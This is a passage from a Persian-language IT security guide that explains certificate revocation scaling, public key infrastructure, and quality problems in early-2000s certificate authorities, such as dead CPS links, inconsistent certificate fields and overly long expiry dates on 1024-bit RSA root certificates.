‫‪ Explorer‬ﺭﺍ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﺍﺯ ﻳﻚ ‪ CRL‬ﻣﺤﻠﻲ ﻭﺍﺩﺍﺭ ﻣﻲﻛﺮﺩ ﺗﺎ ﺍﻋﺘﺒﺎﺭ ﮔﻮﺍﻫﻲﻫﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻛﻨﺪ‪ ،‬ﻭ ﻧﻴﺰ ﻳﻚ ﻓﻬﺮﺳﺖ ‪ CRL‬ﻛﻪ ﺩﻭ ﮔﻮﺍﻫﻲ ﺍﺷﺘﺒﺎﻩ ﺻﺎﺩﺭ ﺷﺪﻩ‬
‫ﺗﻮﺳﻂ ‪ VeriSign‬ﺩﺭ ﺁﻥ ﺑﻮﺩ‪.‬‬
‫‪٣٢٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻲ ﺍﻋﺘﺒﺎ ﹺﺭ ﮔﻮﺍﻫﻲ‪ ،‬ﻣﺸﻜﻞ "ﻣﻘﻴﺎﺱ" ﺍﺳﺖ‪ .‬ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﮔﻮﺍﻫﻲﻫﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ‬ ‫ﻣﺸﻜﻞ ﺍﻭﻝ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﺍﺭﺯﻳﺎﺑ ﹺ‬
‫ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﺳﺮﻳﻌﺘﺮ ﻭ ﺳﺮﻳﻌﺘﺮ ﺷﻮﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺟﺎﻣﻌﺔ ﺩﺭﺣﺎﻝ ﺭﺷﺪ ﻛـﺎﺭﺑﺮﺍﻥ‪ ،‬ﺍﺭﺍﺋـﻪ ﺧـﺪﻣﺎﺕ‬
‫ﺩﻫﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﻼﺩﺭﻧﮓ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺕ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﺷﺮﻛﺖ ﺗﺠﺎﺭﻱ ﺍﻣﻜﺎﻥ ﺍﺗﺼﺎﻝ‬
‫ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺑﺎ ﻳﻚ ﮔﻮﺍﻫﻲ ﺑﺎﻳﺪ ﭼﮕﻮﻧﻪ ﺑﺮﺧﻮﺭﺩ ﻛﻨﺪ؟ ﺑﻪ ﺁﻥ ﺍﻋﺘﻤﺎﺩ ﻛﻨﺪ ﻳﺎ ﺍﻋﺘﺒﺎﺭﻱ ﺑـﺮﺍﻱ ﺁﻥ ﻗﺎﺋـﻞ ﻧـﺸﻮﺩ؟‬
‫ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺍﻋﺘﻤﺎﺩ ﻛﺮﺩﻥ ﺑﺎﺷﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﻣﺠﺎﺯﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﻣﻮﺟﺐ ﺍﺯ ﻛﺎﺭ‬
‫ﺍﻓﺘﺎﺩﻥ ﺁﻥ ﺩﺭ ﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﮔﻮﺍﻫﻲ ﻧﺎﻣﻌﺘﺒﺮ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﭘﻴﺶﻓﺮﺽ ﺑﻲﺍﻋﺘﻤﺎﺩﻱ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻬﺎﺟﻢ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺍﺯ ﺣﻤﻼﺕ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺑﺎﻋﺚ ﺷﻮﺩ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺑﻄﺎﻝ ﺩﺭ ﺩﺳﺘﺮﺱ ﻧﺒﺎﺷﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻛﻠﻴﺔ ﺗﺮﺍﻛﻨﺸﻬﺎ ﺭﺩ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺍﻋﺘﺒـﺎﺭ ﺷـﺮﻛﺖ‬
‫ﺑﺴﺮﻋﺖ ﺧﺪﺷﻪﺩﺍﺭ ﮔﺮﺩﺩ‪.‬‬

‫ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬


‫ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ )‪ (PKI‬ﺷﺎﻣﻞ ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺳﻴﺴﺘﻢ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‪ ،‬ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ‪ ،‬ﺍﺑﺰﺍﺭﻫـﺎ‪ ،‬ﺳﻴـﺴﺘﻤﻬﺎ‪ ،‬ﻭ ﻧﻴـﺰ‬
‫ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻦ ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺩﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻃﺮﻓﺪﺍﺭﺍﻥ ﺍﻭﻟﻴﻪ ﺑﻪ ‪ ،PKI‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻣﺘﻤﺮﻛﺰ ﺑﻮﺩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﺔ ﺩﻭﻟﺘﻬﺎ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻣﻲﺷﺪ ﺗﺎ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ‬
‫ﻫﻢ ﻣﺜﻞ ﺷﻨﺎﺳﻨﺎﻣﻪ ﻭ ﮔﺬﺭﻧﺎﻣﻪ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﺩﻭﻟﺘﻬﺎ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻳﻦ ﺩﻳﺪﮔﺎﻩ ﻗﺎﺑﻞ ﺑﺮﺭﺳﻲ ﺑﻮﺩ‪ ،‬ﺍﻣﺎ ﻫﺮﭼﻪ ﺑﻮﺩ ﺗﺎ ﻛﻨﻮﻥ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻧـﺸﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﺷﺮﻛﺘﻬﺎﻳﻲ ﻣﺜﻞ ‪ VeriSign‬ﻣﻴﻠﻴﻮﻧﻬﺎ ﮔﻮﺍﻫﻲ ﺑﺮﺍﻱ ﻣﻌﻴﻦ ﻛﺮﺩﻥ ﻫﻮﻳﺖ ﺍﻓﺮﺍﺩ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺻﺎﺩﺭ ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻛﻠﻴﺪﻫﺎﻱ ﺍﻣﻀﺎﻱ ﻋﻼﻳﻢ ﺍﻳـﻦ‬
‫ﮔﻮﺍﻫﻲﻫﺎ ﺩﺭ ﻣﻘﻴﺎﺱ ﮔﺴﺘﺮﺩﻩﺍﻱ ﺗﻮﺯﻳﻊ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻳـﻦ ﺳﻠـﺴﻪ ﻣﺮﺍﺗـﺐ ﺍﻋﺘﻤـﺎﺩ ‪ -‬ﻣﺜـﻞ ﺳﻠـﺴﻠﻪ ﻣﺮﺍﺗﺒـﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺯﻳـﺎﺑﻲ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻭﺏ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ‪ -‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺗﻮﺳﻂ ﺑﻴﺶ ﺍﺯ ﺻﺪ ﻣﻴﻠﻴـﻮﻥ ﻧﻔـﺮ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺭﺩ؛ ﺍﻣـﺎ‬
‫ﺑﻮﺳﻴﻠﺔ ﺷﺮﻛﺘﻬﺎﻱ ﺗﺠﺎﺭﻱ ﺧﺼﻮﺻﻲ‪ ،‬ﻭ ﻧﻪ ﺑﻮﺳﻴﻠﻪ ﺩﻭﻟﺖ‪ .‬ﻛﻠﻤﻪ "ﻋﻤﻮﻣﻲ" ﺩﺭ ‪ PKI‬ﻧﻴﺰ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺩ ﺑﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻋﻤﻮﻣﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ‬
‫ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ‪ ،‬ﻭ ﻧﻪ ﺑﻪ ﻋﻤﻮﻡ ﻣﺮﺩﻡ ﺑﺼﻮﺭﺕ ﻛﻠﻲ‪.‬‬

‫ﻣﺸﻜﻼﺕ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﺮﻭﺯﻱ‬


‫ﻫﺮﭼﻨﺪ ﺑﺎﻋﺚ ﺗﺄﺳﻒ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺍﮔﺮ ﺑﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﺻﻠﻲ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷـﺪﻩ ﻛـﻪ ﺩﺭ ‪ Internet Explorer‬ﻭ ‪Netscape Navigator‬‬
‫ﻧﮕﺎﻩ ﺩﻗﻴﻘﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ﺩﺭ ﺧﻮﺍﻫﻴﺪ ﻳﺎﻓﺖ ﻧﺎﺳﺎﺯﮔﺎﺭﻳﻬﺎ ﻭ ﻣﺸﻜﻼﺕ ﻛﻨﺘﺮﻝ ﻛﻴﻔﻴﺖ ﺑﺰﺭﮔﻲ ﺩﺭ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻣﺮﻭﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪.‬‬

‫ﻛﻮﺗﺎﻩ ﺑﻮﺩﻥ ﺩﻭﺭﻩ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺳﻴﺎﺳﺖﻫﺎﻱ ﮐﺎﺭﺑﺮﺩ ﮔﻮﺍﻫﻲ‬


‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺑﺮﺍﻱ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﺩ ﻛﻪ ﻫﻤﺔ ‪URL‬ﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﮐﻪ ﺻﺎﺩﺭ ﮐﺮﺩﻩ ﺁﻣﺪﻩ ﺭﺍ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ‪ CPS ،‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺧﻮﺩ ﺭﺍ ﻋﻮﺽ ﻛﻨﺪ‪ ،‬ﺁﻧﮕﺎﻩ ﻫﺮ ‪ CPS‬ﺑﺎﻳﺪ ﺍﺯ ﻳـﻚ ‪ URL‬ﻳﻜﺘـﺎ ﺑﺪﺳـﺖ ﺁﻳـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﻲ ﻣﻮﺭﺩ ﺗﺄﻳﻴﺪ ﻛﻪ ﺑﻪ ﺁﻥ ‪ CPS‬ﺑﺎﺯﻣﻲﮔﺮﺩﺩ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﺑﺎﺷـﻨﺪ‪ ،‬ﭼـﻮﻥ ﻣﻌﻨـﺎﻱ ﺣﻘـﻮﻗﻲ ﻭ‬ ‫ﻟﻴﻨﻜﻬﺎ ﺑﺎﻳﺪ ﺩﺭ ﺗﻤﺎﻡ ﻣﺪﺕ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫ ﹺ‬
‫ﻗﺎﻧﻮﻧﻲ ﮔﻮﺍﻫﻲ ﺑﺪﻭﻥ ﺧﻮﺍﻧﺪﻥ ‪ CPS‬ﻗﺎﺑﻞ ﺗﺸﺨﻴﺺ ﻧﺨﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ‪ ،‬ﭼﻮﻥ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻌﻨﺎﻱ ﻳﻚ ﺍﻣـﻀﺎ ﭼﻨـﺪ‬
‫ﺳﺎﻝ ﺑﻌﺪ ﺍﺯ ﭘﺪﻳﺪ ﺁﻣﺪﻥ ﺁﻥ ﻣﻮﺭﺩ ﺳﺆﺍﻝ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪ ،‬ﻗﺎﻋﺪﺗﹰﺎ ‪URL‬ﻫﺎ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻳﻚ ﺑﺎﺯﺓ ﺣﺪﺍﻗﻞ ‪ ۲۰‬ﺳﺎﻟﻪ ﻓﻌﺎﻝ ﺑﻤﺎﻧﻨﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺍﺯ ‪CPS‬ﻫﺎﻳﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩﻩﺍﻧﺪ ﻛﻪ ﺩﻳﮕﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﻤﻲﺑﺎﺷﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻼ ﮔـﻮﺍﻫﻲ‬
‫ﺧﻮﺩ ﺍﻣﻀﺎﻱ ‪ Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C.‬ﻛـﻪ‬
‫ﺑﻪ ﻫﻤﺮﺍﻩ ﺑﺮﻧﺎﻣﺔ ‪ Internet Explorer 5.0‬ﺗﻮﺯﻳﻊ ﺷﺪﻩ‪ ،‬ﺍﺯ ﮊﻭﺋﻦ ‪ ۱۹۹۹‬ﺗﺎ ﮊﻭﺋﻦ ‪ ۲۰۰۹‬ﻣﻌﺘﺒﺮ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﮔـﻮﺍﻫﻲ ﺍﺩﻋـﺎ ﻣـﻲﻛﻨـﺪ ﻛـﻪ‬
‫‪ CPS‬ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺩﺭ ﺁﺩﺭﺱ ‪ http://www.correduriapublica.org.mx/RCD/dpc‬ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺍﻳـﻦ‬
‫‪ URL‬ﺣﺪﺍﻗﻞ ﺩﺭ ﺁﻭﺭﻳﻞ ‪ ۲۰۰۱‬ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﻧﺒﻮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٢٦‬‬

‫ﻧﺎﭘﺎﻳﺪﺍﺭﻱﻫﺎ ﺩﺭ ﻓﻴﻠﺪﻫﺎﻱ ﮔﻮﺍﻫﻲ‬


‫ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ‪ Netscape Navigator‬ﻭ ‪ Internet Explorer‬ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻌﻨﻮﺍﻥ ﭘﺎﻳﻪﺍﻱ ﺑﺮﺍﻱ ﺯﻳﺮﺳـﺎﺧﺖ‬
‫ﺗﺠﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺟﻬﺎﻥ ﻭ ﻋﻘﺪ ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ .‬ﺁﻧﭽﻪ ﺍﻳﻦ ﻫﺪﻑ ﺭﺍ ﭘﻴﭽﻴﺪﻩ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﻭﺍﻗﻌﻴﺖ ﺍﺳﺖ ﻛـﻪ ﺭﻭﺷـﻬﺎﻱ‬
‫ﺍﺳﺘﻔﺎﺩﺓ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﻓﻴﻠﺪﻫﺎﻱ ﮔﻮﺍﻫﻲ ﺑﺴﻴﺎﺭ ﻣﺘﻨﻮﻉ ﺍﺳﺖ‪ .‬ﺑﻪ ﺑﻴﺎﻥ ﺩﻗﻴﻘﺘﺮ‪ ،‬ﻓﻴﻠﺪ "ﻣﻮﺿﻮﻉ"‪ ،‬ﻛﻪ ﺑﺎ ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ‪ ١٤٦‬ﺧـﻮﺩ ﻣﻌـﺮﻑ‬
‫ﻼ‬
‫ﺻﺎﺩﺭﻛﻨﻨﺪﻩ ﺍﺳﺖ ﻫﻴﭻ ﻗﺎﻟﺐ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﻧﺪﺍﺭﺩ‪ ،‬ﻭ ﮔﻮﺍﻫﻲ ﻳﻚ ﻣﺮﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻣﺘﻔﺎﻭﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺷـﺎﻣﻞ ﺻـﻔﺎﺕ ﻣﻤﻴـﺰﺓ ﻛـﺎﻣ ﹰ‬
‫ﻣﺘﻔﺎﻭﺗﻲ ﺑﺎﺷﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﮔﻮﺍﻫﻲ ﺑﺨﻮﺍﻫﺪ ﺩﺭ ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ ﺗﻮﺳﻂ ﻧﺮﻡﺍﻓﺰﺍﺭ ﭘﺮﺩﺍﺯﺵ ﺷﻮﺩ‪ ،‬ﺍﻟﺰﺍﻡ ﺩﺭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺳـﻢ ﻣﻤﻴـﺰﻩ ﻭ‬
‫ﻓﻴﻠﺪﻫﺎﻱ ﺩﻳﮕﺮ ﺣﻴﺎﺗﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﺍﻟﺰﺍﻡ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﮔﻮﺍﻫﻲﻫﺎ ﺑﺎﻳﺪ ﺑﻮﺳﻴﻠﻪ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﺑـﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ ﻫﻤـﺔ ﺍﻧـﻮﺍﻉ ﻭ‬
‫ﻗﺎﻟﺒﻬﺎﻱ ﻣﺨﺘﻠﻒ ﻭ ﻗﺎﺑﻞ ﺗﺼﻮﺭ ﻧﺎﻣﻬﺎﻱ ﻣﺸﺮﻭﻉ ﺑﺼﻮﺭﺕ ﺑﺼﺮﻱ ﺁﻣﻮﺯﺵ ﺩﻳﺪﻩﺍﻧﺪ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺗﺎ ﺑﺘﻮﺍﻥ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻣﻌﺘﺒﺮ ﺭﺍ ﺍﺯ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﻧﺎﻣﻌﺘﺒﺮ ﺗﺸﺨﻴﺺ ﺩﺍﺩ‪.‬‬

‫ﺗﺎﺭﻳﺦﻫﺎﻱ ﺍﻧﻘﻀﺎﻱ ﻏﻴﺮ ﻭﺍﻗﻊﮔﺮﺍﻳﺎﻧﻪ‬


‫ﻧﺴﺨﻪﻫﺎﻱ ﺍﻭﻟﻴﻪ ﻣﺮﻭﺭﮔﺮ ‪ Netscape Navigator‬ﺑﺎ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺗﻮﺯﻳﻊ ﺷﺪ ﻛﻪ ﺗﺎﺭﻳﺦ ﺍﻧﻘﻀﺎﻳﺸﺎﻥ ﺑﻴﻦ ‪ ۲۵‬ﻭ ‪ ۳۱‬ﺩﺳﺎﻣﺒﺮ ‪ ۱۹۹۹‬ﺑﻮﺩ‪.‬‬
‫ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﻃﻮﻻﻧﻲﺗﺮ ﺍﺯ ﺁﻧﭽﻪ ﺍﻧﺘﻈﺎﺭ ﺁﻥ ﻣﻲﺭﻓﺖ ﻫﻤﭽﻨﺎﻥ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻨﺪ‪ .‬ﺩﺭ ﭘﺎﻳـﺎﻥ ﺳـﺎﻝ ‪ ۱۹۹۹‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ‬
‫ﻣﺤﺼﻮﻻﺕ ﻛﻪ ﮔﻮﺍﻫﻲﻫﺎﻱ ﻗﺪﻳﻤﻲ ﺩﺭ ﺧﻮﺩ ﺩﺍﺷﺘﻨﺪ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻧﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﺍﻳـﻦ ﺍﻣﻜـﺎﻥ ﺑﺎﻳـﺪ ﻭﺟـﻮﺩ ﻣـﻲﺩﺍﺷـﺖ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺑـﺴﺎﺩﮔﻲ‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ‪ download‬ﻛﺮﺩ‪ ،‬ﺍﻣﺎ ﺑﺪﻟﻴﻞ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺩﻳﮕﺮ ﺩﺭ ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﺍﻭﻟﻴﻪ‪ ،‬ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺗﻮﺻـﻴﻪ ﺷـﺪ ﻛـﻪ ﻛـﻞ‬
‫ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺧﻮﺩ ﺭﺍ ﺍﺭﺗﻘﺎ ﺩﻫﻨﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﻪ ﺑﻪ ﺁﻥ ﻭﺍﺑﺴﺘﻪ ﺑﻮﺩﻧﺪ ﻧﺎﮔﻬﺎﻥ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩﻩ ﺑﻮﺩ ﻧﺎﺭﺍﺿﻲ ﺑﻮﺩﻧﺪ‪.‬‬
‫ﭘﺲ ﺍﺯ ﺍﻳﻦ ﺗﺠﺮﺑﻪ‪ ،‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺍﮐﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﺗﺼﻤﻴﻤﻲ ﮔﺮﻓﺘﻨﺪ ﻛﻪ ﻣﻮﺟﺐ ﺷﺪ ﺍﺯ ﺳﻮﻳﻲ ﺩﻳﮕﺮ ﻣﺮﺗﻜﺐ ﺍﺷﺘﺒﺎﻩ ﺷﻮﻧﺪ‪ .‬ﺁﻧﻬﺎ ﺷﺮﻭﻉ ﺑﻪ‬
‫ﺗﻮﺯﻳﻊ ﮔﻮﺍﻫﻲﻫﺎﻳﻲ ﺑﺎ ﺯﻣﺎﻧﻬﺎﻱ ﺍﻧﻘﻀﺎﻱ ﺑﺴﻴﺎﺭ ﻃﻮﻻﻧﻲ ﻛﺮﺩﻧﺪ‪ .‬ﺗﻤﺎﻡ ﮔﻮﺍﻫﻲﻫـﺎﻱ ﺗﻮﺯﻳـﻊﺷـﺪﻩ ﺑـﻪ ﻫﻤـﺮﺍﻩ ‪،Internet Explorer 5.0‬‬
‫ﮔﻮﺍﻫﻲﻫﺎﻱ ‪ ۱۰۲۴‬ﺑﻴﺘﻲ ‪ RSA‬ﻫﺴﺘﻨﺪ‪ ،‬ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻴﺶ ﺍﺯ ﻧﻴﻤﻲ ﺍﺯ ﺍﻳﻦ ﮔﻮﺍﻫﻲﻫﺎ ﺗـﺎﺭﻳﺦ ﺍﻧﻘـﻀﺎﻫﺎﻳﻲ ﺑـﺮﺍﻱ ﺑﻌـﺪ ﺍﺯ ‪ ۱‬ﮊﺍﻧﻮﻳـﻪ ‪۲۰۱۹‬‬
‫ﺩﺍﺭﻧﺪ‪ VeriSign .‬ﻧﻴﺰ ﻫﺸﺖ ﮔﻮﺍﻫﻲ ﺑﺎ ﺗﺎﺭﻳﺦ ﺍﻧﻘﻀﺎﻱ ﺳﺎﻝ ‪ ۲۰۲۸‬ﻫﻤﺮﺍﻩ ‪ Internet Explorer 5.5‬ﺗﻮﺯﻳﻊ ﻛﺮﺩﻩ ﺍﺳـﺖ‪ .‬ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬
‫ﻣﺘﺨﺼﺼﻴﻦ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣﻌﺘﻘﺪﻧﺪ ﻛﻪ ‪RSA‬ﻫﺎﻱ ‪ ۱۰۲۴‬ﺑﻴﺘﻲ ﺩﺭ ﺁﻥ ﺗﺎﺭﻳﺦ ﺩﻳﮕﺮ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻳﻤﻦ ﻣﺤﺴﻮﺏ ﻧﺨﻮﺍﻫﻨﺪ ﺷﺪ‪.‬‬

‫ﻣﻮﺿﻮﻋﺎﺕ ﺧﻂ ﻣﺸﻲ ‪PKI‬‬

